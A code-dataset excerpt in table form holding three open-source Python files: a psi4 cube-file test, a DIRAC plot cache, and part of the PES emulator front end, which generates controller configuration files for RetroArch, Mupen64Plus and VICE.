text
stringlengths 12
1.05M
| repo_name
stringlengths 5
86
| path
stringlengths 4
191
| language
stringclasses 1
value | license
stringclasses 15
values | size
int32 12
1.05M
| keyword
listlengths 1
23
| text_hash
stringlengths 64
64
|
|---|---|---|---|---|---|---|---|
"""
Test Python-side generation of cube files
"""
import psi4
from .utils import compare_cubes
def test_pyside_cubegen():
mol = psi4.geometry("""
O 0 0 0
H 0 0 1.795239827225189
H 1.693194615993441 0 -0.599043184453037
symmetry c1
units au
""")
psi4.core.be_quiet()
psi4.set_options({'basis': "sto-3g",
'scf_type': 'pk',
'cubeprop_tasks': ['density', 'orbitals']})
scf_e, wfn = psi4.energy('SCF', return_wfn=True, molecule=mol)
psi4.cubeprop(wfn)
cubegen = psi4.core.CubeProperties(wfn)
Dtot = wfn.Da()
Dtot.add(wfn.Db())
cubegen.compute_density(Dtot, "Dtot")
alpha_orbitals = wfn.Ca_subset("AO", "OCC").np
# select the three highest occupied orbitals
occs = alpha_orbitals[:, -3:]
occs_pm = psi4.core.Matrix.from_array(occs)
cubegen.compute_orbitals(occs_pm, [0, 2], ["1", "3"], "orbital")
assert compare_cubes("Dt.cube", "Dtot.cube")
assert compare_cubes("Psi_a_5_5-A.cube", "orbital_3_3.cube")
assert compare_cubes("Psi_a_3_3-A.cube", "orbital_1_1.cube")
|
jgonthier/psi4
|
tests/pytests/test_pyside_cubegen.py
|
Python
|
lgpl-3.0
| 1,124
|
[
"Psi4"
] |
254e3fc485e61dcd509d2014cfb491d3be9f53cadbd4d88f8e6579da93192753
|
""" Cache for the Plotting service plots
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
__RCSID__ = "$Id$"
import os.path
import time
import threading
from DIRAC import S_OK, S_ERROR, gLogger
from DIRAC.Core.Utilities.DictCache import DictCache
from DIRAC.Core.Utilities.Graphs import graph
class PlotCache(object):
def __init__(self, plotsLocation=False):
self.plotsLocation = plotsLocation
self.alive = True
self.__graphCache = DictCache(deleteFunction=_deleteGraph)
self.__graphLifeTime = 600
self.purgeThread = threading.Thread(target=self.purgeExpired)
self.purgeThread.start()
def setPlotsLocation(self, plotsDir):
self.plotsLocation = plotsDir
for plot in os.listdir(self.plotsLocation):
if plot.find(".png") > 0:
plotLocation = "%s/%s" % (self.plotsLocation, plot)
gLogger.verbose("Purging %s" % plotLocation)
os.unlink(plotLocation)
def purgeExpired(self):
while self.alive:
time.sleep(self.__graphLifeTime)
self.__graphCache.purgeExpired()
def getPlot(self, plotHash, plotData, plotMetadata, subplotMetadata):
"""
Get plot from the cache if exists, else generate it
"""
plotDict = self.__graphCache.get(plotHash)
if plotDict is None:
basePlotFileName = "%s/%s.png" % (self.plotsLocation, plotHash)
if subplotMetadata:
retVal = graph(plotData, basePlotFileName, plotMetadata, metadata=subplotMetadata)
else:
retVal = graph(plotData, basePlotFileName, plotMetadata)
if not retVal['OK']:
return retVal
plotDict = retVal['Value']
if plotDict['plot']:
plotDict['plot'] = os.path.basename(basePlotFileName)
self.__graphCache.add(plotHash, self.__graphLifeTime, plotDict)
return S_OK(plotDict)
def getPlotData(self, plotFileName):
filename = "%s/%s" % (self.plotsLocation, plotFileName)
try:
with open(filename, "rb") as fd:
data = fd.read()
except Exception as v:
return S_ERROR("Can't open file %s: %s" % (plotFileName, str(v)))
return S_OK(data)
def _deleteGraph(plotDict):
try:
for key in plotDict:
value = plotDict[key]
if value and os.path.isfile(value):
os.unlink(value)
except Exception:
pass
gPlotCache = PlotCache()
|
yujikato/DIRAC
|
src/DIRAC/FrameworkSystem/Service/PlotCache.py
|
Python
|
gpl-3.0
| 2,364
|
[
"DIRAC"
] |
726c5898ec3d4bc5a93e973675b2bc891811e69376da4c00697d9f08502b2a1b
|
#
# This file is part of the Pi Entertainment System (PES).
#
# PES provides an interactive GUI for games console emulators
# and is designed to work on the Raspberry Pi.
#
# Copyright (C) 2014-2021 Neil Munday (neil@mundayweb.com)
#
# PES is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# PES is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with PES. If not, see <http://www.gnu.org/licenses/>.
#
from ctypes import c_int, c_char, c_char_p, c_uint32, c_void_p, byref, cast
from datetime import datetime
from pes import *
from pes.data import *
from pes.dbupdate import *
from pes.gamecontrollerdb import GameControllerDb
from pes.retroachievements import *
from pes.ui import *
import pes.event
from pes.util import *
from PIL import Image
from collections import OrderedDict
from subprocess import Popen, PIPE
from xml.etree import ElementTree
from xml.etree.ElementTree import Element, SubElement
import alsaaudio
import glob
import logging
import math
import ConfigParser
import pes.event
import random
import re
import sdl2
import sdl2.ext
import sdl2.sdlimage
import sdl2.joystick
import sdl2.video
import sdl2.render
import sdl2.sdlgfx
import sdl2.sdlttf
import sdl2.timer
import sqlite3
import sys
import threading
import time
import urllib
import urllib2
try:
import cec
except ImportError:
pass
CONSOLE_TEXTURE_ALPHA = 50
JOYSTICK_AXIS_MIN = -32766
JOYSTICK_AXIS_MAX = 32766
logging.getLogger("PIL").setLevel(logging.WARNING)
def mapAxisToKey(axis, value):
if axis == sdl2.SDL_CONTROLLER_AXIS_LEFTY:
if value > 0:
return sdl2.SDLK_DOWN
return sdl2.SDLK_UP
return None
def mapButtonToKey(button):
if button == sdl2.SDL_CONTROLLER_BUTTON_DPAD_DOWN:
return sdl2.SDLK_DOWN
if button == sdl2.SDL_CONTROLLER_BUTTON_DPAD_UP:
return sdl2.SDLK_UP
if button == sdl2.SDL_CONTROLLER_BUTTON_DPAD_LEFT:
return sdl2.SDLK_LEFT
if button == sdl2.SDL_CONTROLLER_BUTTON_DPAD_RIGHT:
return sdl2.SDLK_RIGHT
if button == sdl2.SDL_CONTROLLER_BUTTON_A:
return sdl2.SDLK_RETURN
if button == sdl2.SDL_CONTROLLER_BUTTON_B:
return sdl2.SDLK_BACKSPACE
if button == sdl2.SDL_CONTROLLER_BUTTON_BACK: # select button
return sdl2.SDLK_s
if button == sdl2.SDL_CONTROLLER_BUTTON_LEFTSHOULDER:
return sdl2.SDLK_PAGEUP
if button == sdl2.SDL_CONTROLLER_BUTTON_RIGHTSHOULDER:
return sdl2.SDLK_PAGEDOWN
if button == sdl2.SDL_CONTROLLER_BUTTON_GUIDE:
return sdl2.SDLK_HOME
return None
def mapRemoteButtonEvent(button):
key = None
if button == cec.CEC_USER_CONTROL_CODE_UP:
key = sdl2.SDLK_UP
elif button == cec.CEC_USER_CONTROL_CODE_DOWN:
key = sdl2.SDLK_DOWN
elif button == cec.CEC_USER_CONTROL_CODE_LEFT:
key = sdl2.SDLK_LEFT
elif button == cec.CEC_USER_CONTROL_CODE_RIGHT:
key = sdl2.SDLK_RIGHT
elif button == cec.CEC_USER_CONTROL_CODE_SELECT:
key = sdl2.SDLK_RETURN
elif button == cec.CEC_USER_CONTROL_CODE_UP:
key = sdl2.SDLK_UP
elif button == cec.CEC_USER_CONTROL_CODE_AN_RETURN or button == cec.CECDEVICE_RESERVED2:
key = sdl2.SDLK_BACKSPACE
else:
return
e = sdl2.SDL_Event()
e.type = sdl2.SDL_KEYDOWN
e.key.keysym.sym = key
return e
def mapControlPadAxisEvent(event, eventType):
key = mapAxisToKey(event.caxis.axis, event.caxis.value)
if key:
e = sdl2.SDL_Event()
e.type = eventType
e.key.keysym.sym = key
return e
return None
def mapControlPadButtonEvent(event, eventType):
key = mapButtonToKey(event.cbutton.button)
if key:
e = sdl2.SDL_Event()
e.type = eventType
e.key.keysym.sym = key
return e
return None
class PESApp(object):
__CONTROL_PAD_BUTTON_REPEAT = 150 # delay in ms between firing events for button holds
__ICON_WIDTH = 32
__ICON_HEIGHT = 32
def __del__(self):
logging.debug("PESApp.del: deleting object")
if getattr(self, "__window", None):
logging.debug("PESApp.del: window destroyed")
sdl2.video.SDL_DestroyWindow(self.__window)
self.__window = None
#def __init__(self, dimensions, fontFile, romsDir, coverartDir, coverartSize, coverartCacheLen, iconCacheLen, badgeDir, backgroundColour, menuBackgroundColour, headerBackgroundColour, lineColour, textColour, menuTextColour, menuSelectedTextColour, lightBackgroundColour, shutdownCommmand, rebootCommand, listTimezonesCommand, getTimezoneCommand, setTimezoneCommand):
def __init__(self, dimensions, pesConfig):
super(PESApp, self).__init__()
self.__dimensions = dimensions
self.__screenSize = None
self.config = pesConfig
self.timezones = []
self.currentTimezone = None
self.__screenSaverTimeout = pesConfig.screenSaverTimeout
self.__fontSizes = pesConfig.fontSizes
ConsoleTask.SCALE_WIDTH = pesConfig.coverartSize
Thumbnail.CACHE_LEN = pesConfig.coverartCacheLen
Icon.CACHE_LEN = pesConfig.iconCacheLen
self.consoles = []
self.consoleSurfaces = {}
self.__uiObjects = [] # list of UI objects created so we can destroy them upon exit
self.lineColour = sdl2.SDL_Color(pesConfig.lineColour[0], pesConfig.lineColour[1], pesConfig.lineColour[2])
self.backgroundColour = sdl2.SDL_Color(pesConfig.backgroundColour[0], pesConfig.backgroundColour[1], pesConfig.backgroundColour[2])
self.headerBackgroundColour = sdl2.SDL_Color(pesConfig.headerBackgroundColour[0], pesConfig.headerBackgroundColour[1], pesConfig.headerBackgroundColour[2])
self.menuBackgroundColour = sdl2.SDL_Color(pesConfig.menuBackgroundColour[0], pesConfig.menuBackgroundColour[1], pesConfig.menuBackgroundColour[2])
self.menuTextColour = sdl2.SDL_Color(pesConfig.menuTextColour[0], pesConfig.menuTextColour[1], pesConfig.menuTextColour[2])
self.menuSelectedTextColour = sdl2.SDL_Color(pesConfig.menuSelectedTextColour[0], pesConfig.menuSelectedTextColour[1], pesConfig.menuSelectedTextColour[2])
self.menuSelectedBgColour = self.lineColour
self.textColour = sdl2.SDL_Color(pesConfig.textColour[0], pesConfig.textColour[1], pesConfig.textColour[2])
self.lightBackgroundColour = sdl2.SDL_Color(pesConfig.lightBackgroundColour[0], pesConfig.lightBackgroundColour[1], pesConfig.lightBackgroundColour[2])
self.__headerHeight = pesConfig.headerHeight
self.menuWidth = pesConfig.menuWidth
self.__footerHeight = 0
self.doJsToKeyEvents = True
self.__cecEnabled = False
self.retroAchievementConn = None
self.achievementUser = None
if pesConfig.retroAchievementsUserName != None and pesConfig.retroAchievementsPassword != None and pesConfig.retroAchievementsApiKey != None:
logging.debug("PESApp.__init__: RetroAchievements user = %s, apiKey = %s" % (pesConfig.retroAchievementsUserName, pesConfig.retroAchievementsApiKey))
self.retroAchievementConn = RetroAchievementConn(pesConfig.retroAchievementsUserName, pesConfig.retroAchievementsApiKey)
self.__retroAchievementsPassword = pesConfig.retroAchievementsPassword
self.setUpRetroAchievementUser()
def exit(self, rtn=0, confirm=False):
if confirm:
self.showMessageBox("Are you sure?", self.exit, rtn, False)
else:
# tidy up
logging.debug("PESApp.exit: stopping screens...")
for s in self.screens:
self.screens[s].stop()
logging.debug("PESApp.exit: purging cached surfaces...")
for console, surface in self.consoleSurfaces.iteritems():
logging.debug("PESApp.exit: unloading surface for %s..." % console)
sdl2.SDL_FreeSurface(surface)
logging.debug("PESApp.exit: tidying up...")
self.__gamepadIcon.destroy()
self.__remoteIcon.destroy()
self.__networkIcon.destroy()
if self.__screenSaverLabel:
self.__screenSaverLabel.destroy()
if self.__msgBox:
self.__msgBox.destroy()
Thumbnail.destroyTextures()
Icon.destroyTextures()
for o in self.__uiObjects:
o.destroy()
sdl2.sdlttf.TTF_CloseFont(self.headerFont)
sdl2.sdlttf.TTF_CloseFont(self.bodyFont)
sdl2.sdlttf.TTF_CloseFont(self.menuFont)
sdl2.sdlttf.TTF_CloseFont(self.titleFont)
sdl2.sdlttf.TTF_CloseFont(self.splashFont)
sdl2.sdlttf.TTF_Quit()
sdl2.sdlimage.IMG_Quit()
sdl2.SDL_Quit()
logging.info("PESApp.exit: exiting...")
sys.exit(rtn)
def getDimensions(self):
return self.__dimensions
def getGameTotal(self):
# get number of games
try:
con = sqlite3.connect(userPesDb)
con.row_factory = sqlite3.Row
cur = con.cursor()
cur.execute('SELECT COUNT(*) AS `total` FROM `games`;')
row = cur.fetchone()
if row == None or row['total'] == 0:
return 0
return int(row['total'])
except sqlite3.Error, e:
pesExit("Error: %s" % e.args[0], True)
finally:
if con:
con.close()
@staticmethod
def getMupen64PlusConfigAxisValue(controller, axis, positive=True, both=False):
bind = sdl2.SDL_GameControllerGetBindForAxis(controller, axis)
if bind:
if bind.bindType == sdl2.SDL_CONTROLLER_BINDTYPE_AXIS:
if both:
return "axis(%d-,%d+)" % (bind.value.axis, bind.value.axis)
if positive:
return "axis(%d+)" % bind.value.axis
return "axis(%d-)" % bind.value.axis
if bind.bindType == sdl2.SDL_CONTROLLER_BINDTYPE_BUTTON:
return "button(%d)" % bind.value.button
return "\"\""
@staticmethod
def getMupen64PlusConfigButtonValue(controller, button, coreEvent=False):
bind = sdl2.SDL_GameControllerGetBindForButton(controller, button)
if bind:
if bind.bindType == sdl2.SDL_CONTROLLER_BINDTYPE_BUTTON:
if coreEvent:
return "B%d" % bind.value.button
return "button(%d)" % bind.value.button
if bind.bindType == sdl2.SDL_CONTROLLER_BINDTYPE_HAT:
if button == sdl2.SDL_CONTROLLER_BUTTON_DPAD_UP:
return "hat(%d Up)" % bind.value.hat.hat
if button == sdl2.SDL_CONTROLLER_BUTTON_DPAD_DOWN:
return "hat(%d Down)" % bind.value.hat.hat
if button == sdl2.SDL_CONTROLLER_BUTTON_DPAD_LEFT:
return "hat(%d Left)" % bind.value.hat.hat
if button == sdl2.SDL_CONTROLLER_BUTTON_DPAD_RIGHT:
return "hat(%d Right)" % bind.value.hat.hat
return "\"\""
@staticmethod
def getRetroArchConfigAxisValue(param, controller, axis, both=False):
bind = sdl2.SDL_GameControllerGetBindForAxis(controller, axis)
if bind:
if bind.bindType == sdl2.SDL_CONTROLLER_BINDTYPE_AXIS:
if both:
return "%s_plus_axis = \"+%d\"\n%s_minus_axis = \"-%d\"\n" % (param, bind.value.axis, param, bind.value.axis)
return "%s_axis = \"+%d\"\n" % (param, bind.value.axis)
if bind.bindType == sdl2.SDL_CONTROLLER_BINDTYPE_BUTTON:
return "%s_btn = \"%d\"\n" % (param, bind.value.button)
if both:
return "%s_plus_axis = \"nul\"\n%s_minus_axis = \"nul\"\n" % (param, param)
return "%s = \"nul\"\n" % param
@staticmethod
def getRetroArchConfigButtonValue(param, controller, button):
bind = sdl2.SDL_GameControllerGetBindForButton(controller, button)
if bind:
if bind.bindType == sdl2.SDL_CONTROLLER_BINDTYPE_BUTTON:
return "%s_btn = \"%d\"\n" % (param, bind.value.button)
if bind.bindType == sdl2.SDL_CONTROLLER_BINDTYPE_AXIS:
#return PESApp.getRetroArchConfigAxisValue(param, controller, bind.value.axis)
if button == sdl2.SDL_CONTROLLER_BUTTON_DPAD_UP or button == sdl2.SDL_CONTROLLER_BUTTON_DPAD_LEFT:
return "%s_axis = \"-%d\"\n" % (param, bind.value.axis)
return "%s_axis = \"+%d\"\n" % (param, bind.value.axis)
if bind.bindType == sdl2.SDL_CONTROLLER_BINDTYPE_HAT:
if button == sdl2.SDL_CONTROLLER_BUTTON_DPAD_UP:
return "%s_btn = \"h%d%s\"\n" % (param, bind.value.hat.hat, "up")
if button == sdl2.SDL_CONTROLLER_BUTTON_DPAD_DOWN:
return "%s_btn = \"h%d%s\"\n" % (param, bind.value.hat.hat, "down")
if button == sdl2.SDL_CONTROLLER_BUTTON_DPAD_LEFT:
return "%s_btn = \"h%d%s\"\n" % (param, bind.value.hat.hat, "left")
if button == sdl2.SDL_CONTROLLER_BUTTON_DPAD_RIGHT:
return "%s_btn = \"h%d%s\"\n" % (param, bind.value.hat.hat, "right")
return "%s = \"nul\"\n" % param
@staticmethod
def getViceButtonValue(controller, joyIndex, button, pin):
bind = sdl2.SDL_GameControllerGetBindForButton(controller, button)
if bind:
if bind.bindType == sdl2.SDL_CONTROLLER_BINDTYPE_BUTTON:
if pin >= 0:
return "%d 1 %d 1 0 %d\n" % (joyIndex, bind.value.button, pin)
return "%d 1 %d %d\n" % (joyIndex, bind.value.button, abs(pin))
elif bind.bindType == sdl2.SDL_CONTROLLER_BINDTYPE_HAT:
# NOTE: not sure this is the correct way to generate hat mappings, works for XBOX 360 at least
if button == sdl2.SDL_CONTROLLER_BUTTON_DPAD_UP:
return "%d 2 0 1 0 %d\n" % (joyIndex, abs(pin))
if button == sdl2.SDL_CONTROLLER_BUTTON_DPAD_DOWN:
return "%d 2 1 1 0 %d\n" % (joyIndex, abs(pin))
if button == sdl2.SDL_CONTROLLER_BUTTON_DPAD_LEFT:
return "%d 2 2 1 0 %d\n" % (joyIndex, abs(pin))
if button == sdl2.SDL_CONTROLLER_BUTTON_DPAD_RIGHT:
return "%d 2 3 1 0 %d\n" % (joyIndex, abs(pin))
return "# error: could not generate binding for button: %d\n" % button
def goBack(self):
logging.debug("PESApp.goBack: adding backspace event to event queue...")
self.screens[self.screenStack[-1]].setMenuActive(False)
e = sdl2.SDL_Event()
e.type = sdl2.SDL_KEYDOWN
e.key.keysym.sym = sdl2.SDLK_BACKSPACE
sdl2.SDL_PushEvent(e)
def initScreens(self):
logging.debug("PESApp.initScreens: initialising screens...")
self.screens["Home"] = HomeScreen(self, self.renderer, self.menuRect, self.screenRect)
self.screens["Settings"] = SettingsScreen(self, self.renderer, self.menuRect, self.screenRect)
self.screens["Play"] = PlayScreen(self, self.renderer, self.menuRect, self.screenRect, None)
consoleScreens = 0
for c in self.consoles:
if c.getGameTotal() > 0:
self.screens["Console %s" % c.getName()] = ConsoleScreen(self, self.renderer, self.menuRect, self.screenRect, c)
consoleScreens += 1
logging.debug("PESApp.initScreens: initialised %d screens of which %d are console screens" % (len(self.screens), consoleScreens))
self.screenStack = ["Home"]
def initSurfaces(self, refreshConsoles=False):
logging.debug("PESApp.initSurfaces: pre-loading console images...")
for c in self.consoles:
if refreshConsoles:
c.refresh()
consoleName = c.getName()
if c.getGameTotal() > 0 and consoleName not in self.consoleSurfaces:
image = c.getImg()
surface = sdl2.sdlimage.IMG_Load(image)
if surface == None:
logging.error("PESApp.initSurfaces: failed to load image: %s" % image)
self.exit(1)
self.consoleSurfaces[consoleName] = surface
logging.debug("PESApp.initSurfaces: pre-loaded %s surface from %s" % (consoleName, image))
def playGame(self, game):
console = game.getConsole()
# are there any files required to use this emulator?
for f in console.getRequiredFiles():
if not os.path.exists(f):
self.showMessageBox("The file %s is required to play games for %s. Please add this file and try again." % (f, console.getName()), None, None)
return
emulator = console.getEmulator()
logging.debug("PESApp.playGame: emulator is %s" % emulator)
if emulator == "RetroArch":
# note: RetroArch uses a SNES control pad button layout, SDL2 uses XBOX 360 layout!
# check joystick configs
joystickTotal = sdl2.joystick.SDL_NumJoysticks()
if joystickTotal > 0:
for i in xrange(joystickTotal):
if sdl2.SDL_IsGameController(i):
c = sdl2.SDL_GameControllerOpen(i)
if sdl2.SDL_GameControllerGetAttached(c):
# get joystick name
j = sdl2.SDL_GameControllerGetJoystick(c)
jsName = sdl2.SDL_JoystickName(j)
jsConfig = os.path.join(userRetroArchJoysticksConfDir, "%s.cfg" % jsName)
logging.debug("PESApp.playGame: checking for \"%s\" config..." % jsConfig)
logging.debug("PESApp.playGame: creating configuration file %s for %s" % (jsConfig, jsName))
vendorId, productId = getJoystickDeviceInfoFromGUID(getJoystickGUIDString(sdl2.SDL_JoystickGetDeviceGUID(i)))
with open(jsConfig, 'w') as f:
# control pad id etc.
f.write("input_device = \"%s\"\n" % jsName)
f.write("input_vendor_id = \"%s\"\n" % vendorId)
f.write("input_product_id = \"%s\"\n" % productId)
#f.write("input_driver = \"udev\"\n")
# buttons
f.write(self.getRetroArchConfigButtonValue("input_a", c, sdl2.SDL_CONTROLLER_BUTTON_B))
f.write(self.getRetroArchConfigButtonValue("input_b", c, sdl2.SDL_CONTROLLER_BUTTON_A))
f.write(self.getRetroArchConfigButtonValue("input_x", c, sdl2.SDL_CONTROLLER_BUTTON_Y))
f.write(self.getRetroArchConfigButtonValue("input_y", c, sdl2.SDL_CONTROLLER_BUTTON_X))
f.write(self.getRetroArchConfigButtonValue("input_start", c, sdl2.SDL_CONTROLLER_BUTTON_START))
f.write(self.getRetroArchConfigButtonValue("input_select", c, sdl2.SDL_CONTROLLER_BUTTON_BACK))
# shoulder buttons
f.write(self.getRetroArchConfigButtonValue("input_l", c, sdl2.SDL_CONTROLLER_BUTTON_LEFTSHOULDER))
f.write(self.getRetroArchConfigButtonValue("input_r", c, sdl2.SDL_CONTROLLER_BUTTON_RIGHTSHOULDER))
f.write(self.getRetroArchConfigAxisValue("input_l2", c, sdl2.SDL_CONTROLLER_AXIS_TRIGGERLEFT))
f.write(self.getRetroArchConfigAxisValue("input_r2", c, sdl2.SDL_CONTROLLER_AXIS_TRIGGERRIGHT))
# L3/R3 buttons
f.write(self.getRetroArchConfigButtonValue("input_l3", c, sdl2.SDL_CONTROLLER_BUTTON_LEFTSTICK))
f.write(self.getRetroArchConfigButtonValue("input_r3", c, sdl2.SDL_CONTROLLER_BUTTON_RIGHTSTICK))
# d-pad buttons
f.write(self.getRetroArchConfigButtonValue("input_up", c, sdl2.SDL_CONTROLLER_BUTTON_DPAD_UP))
f.write(self.getRetroArchConfigButtonValue("input_down", c, sdl2.SDL_CONTROLLER_BUTTON_DPAD_DOWN))
f.write(self.getRetroArchConfigButtonValue("input_left", c, sdl2.SDL_CONTROLLER_BUTTON_DPAD_LEFT))
f.write(self.getRetroArchConfigButtonValue("input_right", c, sdl2.SDL_CONTROLLER_BUTTON_DPAD_RIGHT))
# axis
f.write(self.getRetroArchConfigAxisValue("input_l_x", c, sdl2.SDL_CONTROLLER_AXIS_LEFTX, True))
f.write(self.getRetroArchConfigAxisValue("input_l_y", c, sdl2.SDL_CONTROLLER_AXIS_LEFTY, True))
f.write(self.getRetroArchConfigAxisValue("input_r_x", c, sdl2.SDL_CONTROLLER_AXIS_RIGHTX, True))
f.write(self.getRetroArchConfigAxisValue("input_r_y", c, sdl2.SDL_CONTROLLER_AXIS_RIGHTY, True))
# hot key buttons
bind = sdl2.SDL_GameControllerGetBindForButton(c, sdl2.SDL_CONTROLLER_BUTTON_GUIDE)
if bind:
f.write(self.getRetroArchConfigButtonValue("input_enable_hotkey", c, sdl2.SDL_CONTROLLER_BUTTON_GUIDE))
else:
f.write(self.getRetroArchConfigButtonValue("input_enable_hotkey", c, sdl2.SDL_CONTROLLER_BUTTON_BACK))
f.write(self.getRetroArchConfigButtonValue("input_exit_emulator", c, sdl2.SDL_CONTROLLER_BUTTON_START))
f.write(self.getRetroArchConfigButtonValue("input_save_state", c, sdl2.SDL_CONTROLLER_BUTTON_A))
f.write(self.getRetroArchConfigButtonValue("input_load_state", c, sdl2.SDL_CONTROLLER_BUTTON_B))
f.write("input_pause_toggle = \"nul\"\n")
sdl2.SDL_GameControllerClose(c)
# now set-up RetroAchievements
s = "# THIS FILE IS AUTOMATICALLY GENERATED BY PES!\n"
if self.retroAchievementConn == None:
s += "cheevos_enable = false\n"
else:
s += "cheevos_username = %s\n" % self.retroAchievementConn.getUsername()
s += "cheevos_password = %s\n" % self.__retroAchievementsPassword
s += "cheevos_enable = true\n"
if self.config.retroAchievementsHardcore:
s += "cheevos_hardcore_mode_enable = true\n"
else:
s += "cheevos_hardcore_mode_enable = false\n"
with open(userRetroArchCheevosConfFile, "w") as f:
f.write(s)
elif emulator == "Mupen64Plus":
joystickTotal = sdl2.joystick.SDL_NumJoysticks()
if joystickTotal > 0:
if not os.path.exists(userMupen64PlusConfFile):
logging.error("PESApp.playGame: could not open %s" % userMupen64PlusConfFile)
self.exit(1)
configParser = ConfigParser.SafeConfigParser()
configParser.optionxform = str # make options case sensitive
configParser.read(userMupen64PlusConfFile)
bind = sdl2.SDL_GameControllerGetBindForButton(self.__controlPad, sdl2.SDL_CONTROLLER_BUTTON_GUIDE)
if bind:
hotkey = self.getMupen64PlusConfigButtonValue(self.__controlPad, sdl2.SDL_CONTROLLER_BUTTON_GUIDE, True)
else:
hotkey = self.getMupen64PlusConfigButtonValue(self.__controlPad, sdl2.SDL_CONTROLLER_BUTTON_BACK, True)
if configParser.has_section('CoreEvents'):
configParser.set('CoreEvents', 'Joy Mapping Stop', 'J%d%s/%s' % (self.__controlPadIndex, hotkey, self.getMupen64PlusConfigButtonValue(self.__controlPad, sdl2.SDL_CONTROLLER_BUTTON_START, True)))
configParser.set('CoreEvents', 'Joy Mapping Save State', 'J%d%s/%s' % (self.__controlPadIndex, hotkey, self.getMupen64PlusConfigButtonValue(self.__controlPad, sdl2.SDL_CONTROLLER_BUTTON_A, True)))
configParser.set('CoreEvents', 'Joy Mapping Load State', 'J%d%s/%s' % (self.__controlPadIndex, hotkey, self.getMupen64PlusConfigButtonValue(self.__controlPad, sdl2.SDL_CONTROLLER_BUTTON_B, True)))
# loop through each joystick that is connected and save to button config file
# note: max of 4 control pads for this emulator
joystickTotal = sdl2.joystick.SDL_NumJoysticks()
if joystickTotal > 0:
counter = 1
for i in xrange(joystickTotal):
if sdl2.SDL_IsGameController(i):
c = sdl2.SDL_GameControllerOpen(i)
if sdl2.SDL_GameControllerGetAttached(c):
j = sdl2.SDL_GameControllerGetJoystick(c)
jsName = sdl2.SDL_JoystickName(j)
logging.debug("PESApp.playGame: generating Mupen64Plus config for joystick %d: %s" % (i, jsName))
section = 'Input-SDL-Control%d' % (i + 1)
if configParser.has_section(section):
configParser.set(section, 'device', "%d" % i)
configParser.set(section, 'name', '"%s"' % jsName)
configParser.set(section, 'plugged', 'True')
configParser.set(section, 'mouse', 'False')
configParser.set(section, 'mode', '0') # this must be set to 0 for the following values to take effect
configParser.set(section, 'DPad R', self.getMupen64PlusConfigButtonValue(c, sdl2.SDL_CONTROLLER_BUTTON_DPAD_RIGHT))
configParser.set(section, 'DPad L', self.getMupen64PlusConfigButtonValue(c, sdl2.SDL_CONTROLLER_BUTTON_DPAD_LEFT))
configParser.set(section, 'DPad D', self.getMupen64PlusConfigButtonValue(c, sdl2.SDL_CONTROLLER_BUTTON_DPAD_DOWN))
configParser.set(section, 'DPad U', self.getMupen64PlusConfigButtonValue(c, sdl2.SDL_CONTROLLER_BUTTON_DPAD_UP))
configParser.set(section, 'Start', self.getMupen64PlusConfigButtonValue(c, sdl2.SDL_CONTROLLER_BUTTON_START))
configParser.set(section, 'Z Trig', self.getMupen64PlusConfigButtonValue(c, sdl2.SDL_CONTROLLER_BUTTON_LEFTSHOULDER))
configParser.set(section, 'B Button', self.getMupen64PlusConfigButtonValue(c, sdl2.SDL_CONTROLLER_BUTTON_B))
configParser.set(section, 'A Button', self.getMupen64PlusConfigButtonValue(c, sdl2.SDL_CONTROLLER_BUTTON_A))
configParser.set(section, 'C Button R', self.getMupen64PlusConfigAxisValue(c, sdl2.SDL_CONTROLLER_AXIS_RIGHTX, positive=True))
configParser.set(section, 'C Button L', self.getMupen64PlusConfigAxisValue(c, sdl2.SDL_CONTROLLER_AXIS_RIGHTX, positive=False))
configParser.set(section, 'C Button D', self.getMupen64PlusConfigAxisValue(c, sdl2.SDL_CONTROLLER_AXIS_RIGHTY, positive=True))
configParser.set(section, 'C Button U', self.getMupen64PlusConfigAxisValue(c, sdl2.SDL_CONTROLLER_AXIS_RIGHTY, positive=False))
configParser.set(section, 'L Trig', self.getMupen64PlusConfigAxisValue(c, sdl2.SDL_CONTROLLER_AXIS_TRIGGERLEFT))
configParser.set(section, 'R Trig', self.getMupen64PlusConfigAxisValue(c, sdl2.SDL_CONTROLLER_AXIS_TRIGGERRIGHT))
configParser.set(section, 'X Axis', self.getMupen64PlusConfigAxisValue(c, sdl2.SDL_CONTROLLER_AXIS_LEFTX, both=True))
configParser.set(section, 'Y Axis', self.getMupen64PlusConfigAxisValue(c, sdl2.SDL_CONTROLLER_AXIS_LEFTY, both=True))
sdl2.SDL_GameControllerClose(c)
counter += 1
if counter == 4:
break
logging.debug("PESApp.playGame: writing Mupen64Plus config to %s" % userMupen64PlusConfFile)
with open(userMupen64PlusConfFile, 'wb') as f:
configParser.write(f)
widthRe = re.compile("((window|framebuffer)[ ]+width[ ]*)=[ ]*[0-9]+")
heightRe = re.compile("((window|framebuffer)[ ]+height[ ]*)=[ ]*[0-9]+")
# now update gles2n64.conf file to use current resolution
output = ""
with open(userGles2n64ConfFile, 'r') as f:
for line in f:
result = re.sub(widthRe, r"\1=%d" % self.__screenSize[0], line)
if result != line:
output += result
else:
result = re.sub(heightRe, r"\1=%d" % self.__screenSize[1], line)
if result != line:
output += result
else:
output += line
logging.debug("PESApp.playGame: writing gles2n64 config to %s" % userGles2n64ConfFile)
with open(userGles2n64ConfFile, 'w') as f:
f.write(output)
elif emulator == "vice":
joystickTotal = sdl2.joystick.SDL_NumJoysticks()
if joystickTotal > 0:
logging.debug("PESApp.playGame: creating SDL joystick mapping %s" % userViceJoystickConfFile)
with open(userViceJoystickConfFile, 'w') as f:
f.write("# THIS FILE IS AUTOMATICALLY GENERATED BY PES!\n")
f.write("!CLEAR\n")
for i in xrange(joystickTotal):
if sdl2.SDL_IsGameController(i):
c = sdl2.SDL_GameControllerOpen(i)
if sdl2.SDL_GameControllerGetAttached(c):
j = sdl2.SDL_GameControllerGetJoystick(c)
jsName = sdl2.SDL_JoystickName(j)
f.write("# %s\n" % jsName)
# joynum inputtype inputindex action
f.write(self.getViceButtonValue(c, i, sdl2.SDL_CONTROLLER_BUTTON_DPAD_RIGHT, 8))
f.write(self.getViceButtonValue(c, i, sdl2.SDL_CONTROLLER_BUTTON_DPAD_LEFT, 4))
